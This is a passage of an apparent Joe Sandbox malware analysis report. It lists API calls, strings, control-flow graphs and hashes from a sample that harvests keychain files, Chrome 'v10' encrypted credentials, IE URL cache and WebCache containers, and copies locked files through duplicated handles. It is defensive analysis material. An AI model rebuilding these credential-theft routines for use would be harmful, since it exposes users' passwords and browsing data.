                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                      • memset.MSVCRT ref: 00445B52
                                                      • memset.MSVCRT ref: 00445B6A
                                                      • memset.MSVCRT ref: 00445C9B
                                                      • memset.MSVCRT ref: 00445CB3
                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                      • memset.MSVCRT ref: 00445B82
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                      • memset.MSVCRT ref: 00445986
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                      • API String ID: 2263259095-3798722523
                                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                      • String ID: $/deleteregkey$/savelangfile
                                                      • API String ID: 2744995895-28296030
                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0040B71C
                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                      • memset.MSVCRT ref: 0040B756
                                                      • memset.MSVCRT ref: 0040B7F5
                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                      • memset.MSVCRT ref: 0040B851
                                                      • memset.MSVCRT ref: 0040B8CA
                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                      • memset.MSVCRT ref: 0040BB53
                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                      • String ID: chp$v10
                                                      • API String ID: 4165125987-2783969131
                                                      • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                      • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                      APIs
                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                      • free.MSVCRT ref: 0040E49A
                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                      • memset.MSVCRT ref: 0040E380
                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                      • API String ID: 3849927982-2252543386
                                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                      APIs
                                                      • memset.MSVCRT ref: 004091E2
                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                      • String ID:
                                                      • API String ID: 3715365532-3916222277
                                                      • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                      • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->638 659->654 660->650 662->641
                                                      APIs
                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                      • memset.MSVCRT ref: 00413D7F
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                      • memset.MSVCRT ref: 00413E07
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                      • free.MSVCRT ref: 00413EC1
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                      • API String ID: 1344430650-1740548384
                                                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                      • String ID: bhv
                                                      • API String ID: 4234240956-2689659898
                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                      • API String ID: 2941347001-70141382
                                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                      • String ID:
                                                      • API String ID: 2827331108-0
                                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0040C298
                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                      • wcschr.MSVCRT ref: 0040C324
                                                      • wcschr.MSVCRT ref: 0040C344
                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                      • String ID: visited:
                                                      • API String ID: 1157525455-1702587658
                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 free 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                                      APIs
                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                      • memset.MSVCRT ref: 0040E1BD
                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                      • free.MSVCRT ref: 0040E28B
                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                      • API String ID: 2804212203-2982631422
                                                      • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                      • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
